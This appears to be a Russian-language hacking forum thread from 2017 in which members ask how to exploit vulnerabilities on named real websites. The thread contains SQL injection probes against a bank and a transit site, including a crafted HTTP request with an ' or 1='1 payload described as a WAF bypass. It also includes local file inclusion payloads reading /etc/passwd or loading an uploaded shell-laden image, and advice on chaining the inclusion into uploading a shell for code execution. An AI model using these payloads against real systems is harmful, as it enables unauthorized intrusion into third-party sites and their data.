Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    /!*50000bla bla bla*/
     
  2. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    162
    Likes Received:
    31
    Reputations:
    0
    попробуй передать id с помощью POST
    Попробуй url encode
    Попробуй char encode
     
  3. sepo

    sepo Member

    Joined:
    21 Jan 2017
    Messages:
    68
    Likes Received:
    25
    Reputations:
    18
    всем привет,

    кто может, помогиет раскрутить эту скулю:

    Code:
    http://www.sala amsombank.com/pages.php?id=\
     
  4. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    162
    Likes Received:
    31
    Reputations:
    0
    с чего вы решили, что она раскручивабельна?
     
  5. sepo

    sepo Member

    Joined:
    21 Jan 2017
    Messages:
    68
    Likes Received:
    25
    Reputations:
    18
    всмысле??
     
  6. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    162
    Likes Received:
    31
    Reputations:
    0
  7. swat_

    swat_ Member

    Joined:
    4 Nov 2009
    Messages:
    137
    Likes Received:
    30
    Reputations:
    1
    подскажите пожалуйста есть ли в этом коде уязвимость ,если есть ток как её воспроизвести
    file.php?url=site.com%00 на такой запрос выдает ошибку
    Warning: include_once(): Failed opening 'site.com' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/site/public_html/domain.site.com/file.php on line 23

    PHP:
    <?php
    $url 
    = @$_REQUEST['url'];
    $currenturl =  explode("/",$url);
    $getlang "";
    //include the lang in this array
    $lanarray = array('en','hi','ar','cn','id','ms');
    if( @
    $currenturl[0]=='' || !in_array($currenturl[0],$lanarray))
    {
        
    $defaulLang ="en";
    }
    else
    {
        
    $defaulLang =@$currenturl[0];
    }
    $siteUrl "http://$_SERVER[HTTP_HOST]"."/~ttttt/domain.site.com/";
    $filepath 'lang/'.@$defaulLang.'.ini';
    if(
    file_exists($filepath))
    {
      
    $getlang =  parse_ini_file($filepath);
    }
    if(
    $url!='')
    {
        include_once 
    basename($url).".php";
    }
    else
    {
        include_once 
    "home.php";
    }

    ?>
     
  8. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    162
    Likes Received:
    31
    Reputations:
    0
    на сколько я понимаю - url=../../../etc/passwd%00
    url=../../../var/www/site/upload/evil_avatar_with_shell_code.gif%00
    при условии, что функция basename() нам ничего не портит.
     
    #1908 ACat, 12 Jun 2017
    Last edited: 13 Jun 2017
  9. swat_

    swat_ Member

    Joined:
    4 Nov 2009
    Messages:
    137
    Likes Received:
    30
    Reputations:
    1
    file.php?url=../../../etc/passwd%00
    Warning: include_once(): Failed opening 'passwd' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/site/public_html/domain.site.com/file.php on line 23
     
  10. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    162
    Likes Received:
    31
    Reputations:
    0
    http://www.php.su/functions/?basename
    Code:
     <?php
    $path = "/home/httpd/html/index.php";
    $file = basename($path);         // $file содержит "index.php"
    $file = basename($path, ".php"); // $file содержит "index"
    ?> 
    то бишь вектор сужается до дириктории, из которой выполняется сценарий.
     
  11. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    683
    Likes Received:
    1,513
    Reputations:
    460
    Уязвимость есть, но не шибко юзабельная. Если положить или изменить любой файл в этой директории, будет RCE.
    Так же стоит посмотреть, можно ли там подцепить что-то интересное для дальнейшего развития атаки. Простейший пример:
    Уязвим index.php. Рядом лежит upload.php который подключается в admin.php. В админку стоит логин/пароль, а upload.php проверяет наличие коннекта к базе и не может быть вызван напрямую. Следовательно, воспользовавшись локальным инклудом в index.php можно подцепить скрипт загрузки и залить что-то нехорошее :)
     
    ACat likes this.
  12. IvanPa

    IvanPa New Member

    Joined:
    13 Jun 2017
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    всем привет. хочу в свой Интернет магазин впендюрить чат. Допустим клиент заходит на главную страницу сайта и появляется окно чата где оператор или бот ( вначале) помогает клиенту с выбором товара. Помогите оценить какие либо риски. Какие уязвимости стоит рассмотреть. Вообще большинство таких чатов представляют опасность ?
     
  13. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    162
    Likes Received:
    31
    Reputations:
    0
    Для начала скажите какую платформу вы используете.
    В зависимости от этого можно будет обрисовать потенциальные уязвимости.
    Опаснотсть представляют не чаты, опасность представляют упущения в коде.

    А за небольшую сумму проведу black box + white box аудит с подробным отчетом.
     
  14. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    Что можно сделать тут?
    Code:
    http://www.rapibus.sto.ca/index.php?id=176&no_cache=1&tx_ttnews[tt_news]=169'&tx_ttnews[backPid]=176&cHash=1ee0e52092
     
  15. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    162
    Likes Received:
    31
    Reputations:
    0
    SERVER /index.php?id=176&no_cache=1&tx_ttnews[backPid]=176&tx_ttnews[tt_news]=169' or 1='1 HTTP/1.1
    Host: www.rapibus.sto.ca
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Cookie:
    Connection: close
    Content-Length: 0
     
  16. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    и чего ты добился? Боюсь спросить, с чего ты скопировал?
     
  17. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    162
    Likes Received:
    31
    Reputations:
    0
    обошел ваф. из бурпа.
     
  18. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    162
    Likes Received:
    31
    Reputations:
    0
    ssu

    мне бы наставника
     
  19. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    162
    Likes Received:
    31
    Reputations:
    0
    скорее так себе маркетолог :p:D

    я могу аудировать лишь пхп платформу из веб платформ :(
    и владею не всеми критикал уязвимостями

    кстати, https://ru.wikipedia.org/wiki/HTTP тут этого почему-то нету
     
  20. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    162
    Likes Received:
    31
    Reputations:
    0
    из веб платформ
    имеется в виду, что ASP/JSP для меня ХЗ...

    >чего там нету ?
    SERVER